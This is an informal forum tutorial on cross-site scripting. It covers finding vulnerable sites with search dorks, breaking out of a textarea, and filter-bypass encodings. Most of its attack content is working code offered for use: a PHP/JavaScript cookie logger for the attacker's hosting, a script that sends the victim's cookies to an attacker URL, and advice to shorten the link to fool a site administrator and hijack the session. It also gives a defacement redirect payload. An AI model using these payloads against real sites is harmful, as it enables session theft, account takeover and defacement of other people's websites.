XSS Tutorial with Pictures and Detailed Version

What is XSS ?

[*]"XSS" is a short form for: "Cross Site Scripting" as you can see by the name , XSS
deals with scripting. To be more exact: Javascript. 
It's about injecting (almost) every Javascript (and html/css)
command/script in a website.
XSS flaws comes up every time a website doesn't filter the attackers input.
In other words:
the attacker can inject his malicious script into a website, and the browser just
run's the code or script.

What is HTML ?

[*]HyperText Markup Language (HTML) is the main markup language for creating web pages and other information that can be displayed in a web browser.

What is Javascript?

[*]JavaScript (JS) is an interpreted computer programming language. As part of web browsers, implementations allow client-side scripts to interact with the user, control the browser, communicate asynchronously, and alter the document content that is displayed. It has also become common in server-side programming, game development and the creation of desktop applications.

Difference between Java & Javascript

[*]Java is an OOP programming language while Java Script is an OOP scripting language.
Java creates applications that run in a virtual machine or browser while JavaScript code is run on a browser only.
Java code needs to be compiled while JavaScript code are all in text.
They require different plug-ins.

Types of XSS:

[*]Reflected or Nonpersistent XSS Attack:
When a attacker inject his malicious script into a searchquery, a searchbox,
or the end of an url, it's called Reflected XSS Attack. It's like throwing a ball
against a wall and receive him back.

[*]Stored or Persistent XSS Attack:
Is when an injected XSS script is stored permanent on a website, for example in
a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the
site with the malicious code.

[*]Traditional versus DOM-based vulnerabilities
This is a rare used method. Traditionally, cross-site scripting vulnerabilities would occur in server-side code responsible for preparing the HTML response to be served to the user. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

We need to have some knowledge before attempting to perform XSS attack that's why I made the listing above.

How can we find websites vulnerable to XSS ?

[*]Google Dorks
[*]Web vulnerability scanners
[*]Manually

[*] Google Dorks:

Code:

inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

[*] Web vulnerability scanners:

Code:

Acunetix
Skipfish
OWASP Zap
Nessus , etc

[*] Manually which I am going to explain to you now.


You don't need to add random vectors to the search box or whatever it is , you just need to analyze the source code.
So..can we have a look inside the code and see what the hell is going there ? 

YES ! 

So I will show you guys how to analyze the source code and manipulate that damn alert box to fuckin' prompt.

Ok this is my input box where I will insert:

Code:

dR.0xYw0Rm

Lets click get source and we will have a look what's happening inside the source code..

Code:

<textarea cols="80" rows="20" name="headers">dR.0xYw0Rm</textarea>

Hmmm.. let's try to close the </textarea> tags like this:

Code:

</textarea>dR.0xYw0Rm

Let's go again inside the source code and check..



So as we can see now the source code has changed from:

Code:

dR.0xYw0Rm</textarea>

to

Code:

</textarea>dR.0xYw0Rm

Which means that we have closed the textarea tags and we can try to insert our evil code..Let's have a look at the page...do you see any difference ?

Ok the dR.0xYw0Rm ended up out of the box :'( :P

Let's try to insert the javascript code now 

Code:

<script>alert("dR.0xYw0Rm")</script>

No box prompted ?  Let's check the source code:

Code:

<textarea cols="80" rows="20" name="headers"></textarea><script>alert(\"dR.0xYw0Rm\")</script>

Damn , the quotes -> " <- got filtered..

There are many different filters which they don't allow the box to prompt.
Can we do smth to bypass them ?!

DAMN YEAH !!!

Ok, now we are going to encrypt our text to ASCII language with a function called "String.FromCharCode" text to ASCII

Code:

</textarea><script>alert(String.fromCharCode(100,82,46,48,120,89,119,48,82,109))</script>

Don't feel confused!
The numbers below are the ASCII vaules for dR.0xYw0Rm

Code:

100,82,46,48,120,89,119,48,82,109

So our code dont contain quotes anymore.:dance:

Let's insert it to the box

Let's click "get source" to execute the code,

open in new window.

So here it is !! We got the alert box which means that the target is vulnerable to XSS !!!

This is the proper way to check for XSS vulnerabilities on websites.

XSS Advanced Methods

Now I will share with you guys some ways to use XSS against a target. 

KEEP IN MIND THAT ANYTHING EVIL YOU DO TO A TARGET , YOU CAN END UP IN REALLY BIG TROUBLES !! SO ANYTHING YOU DO , YOU DO ON YOUR OWN , THIS IS JUST FOR EDUCATIONAL & INFOMATIONAL PURPOSE !!!

Cookie Stealing

[*]Cookie stealing is the most dangerous attack we can do with a Non-Persistent XSS , it will log the cookies of the user who will access the page to a certain doc.

Now I am going to explain you step by step how to do this.

First we need to find a hosting website , personally I suggest you to use 000webhost.com for uploading malicious codes or anything else. So let's open an account in there.
Now once we have created our site , let's go to File Manager, create a new file , rename it CookieLog.txt
Leave that file blank , don't put anything inside. Now create another file called CookieLogger.php
In this file we have to add some code so it will send the cookies that will log into the CookieLog.txt
So add the code below to the CookieLogger.php , don't forget to name it with .php extension otherwise it wont work!

Code:

<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./CookieLog.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +  // Numeric
  "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
  "abcdefghijklmnopqrstuvwxyz" +
  "-_.!~*'()";  // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
  var ch = plaintext.charAt(i);
  if (ch == " ") {
    encoded += "+";    // x-www-urlencoded, rather than %20
  } else if (SAFECHARS.indexOf(ch) != -1) {
    encoded += ch;
  } else {
    var charCode = ch.charCodeAt(0);
    if (charCode > 255) {
    alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
    "(URL encoding only supports 8-bit characters.)\n" +
    "A space (+) will be substituted." );
    encoded += "+";
    } else {
    encoded += "%";
    encoded += HEX.charAt((charCode >> 4) & 0xF);
    encoded += HEX.charAt(charCode & 0xF);
    }
  }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>

Now that we have our cookie logger , we have to send it to the victim , which will be the website administrator.
In order so the url will be less suspicious we need to Tiny the Url.
Let's go to tinyurl.com and put the url, but don't forget to add the script at the end of the url
and then Tiny it! 

This is the script:

Code:

<script>document.location="http://www.myhost.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

Once you get the cookie, you can use the firefox addon called "Cookie Manager" to manipulate or edit the cookie so you can hijack the administrator session.

DEFACING

In order to deface a website with XSS you need to find a persistent XSS.
You can use the script below to redirect the visitors to your deface page. I suggest you to use 
pastehtml[dot]com as it allows anonymous uploading.

Code:

<script>window.location="http://www.pastehtml.com/YOURDEFACE/";</script>

XSS Filters Bypassing Methods:

[*]ASCII Bypassing
[*]Hex Bypassing
[*]Case Sensitive


[*]ASCII Bypassing when magic_quotes_gpc=ON 

It causes that every " (double quote) ' (single quote), and \ (backslash)
are escaped with a backslash automatically.

How to bypass it ?

use the javascript function called

Code:

String.fromCharCode()

just convert your text in decimal characters as I showed to you guys when we were performing the "attack"

[*]Hex Bypassing

We encode our script into Hex so we can't see clearly on the first look what the code will cause.

The text:

Code:

<script>alert(dR.0xYw0Rm)</script>

How to bypass it ?

The text Hex encoded:

Code:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%52%2e%30%78%59%77%30%52%6d%29%3c%2​f%73%63%72%69%70%74%3e

[*]Case Sensitive Bypassing

This kind of bypass works just in really old filters & stupid filters but it's always worth a try !
All we need to do is executing a script with different size of charachters.

How to bypass it ?

Code:

<sCrIpT>alert('dR.0xYw0Rm');</ScRiPt>

I hope I clarified what XSS is and how it works , if you need help don't hesitate to comment here.

This tutorial is wrote all by one of my friend dr. Woxyworm && Anonleet gives a big thank to him.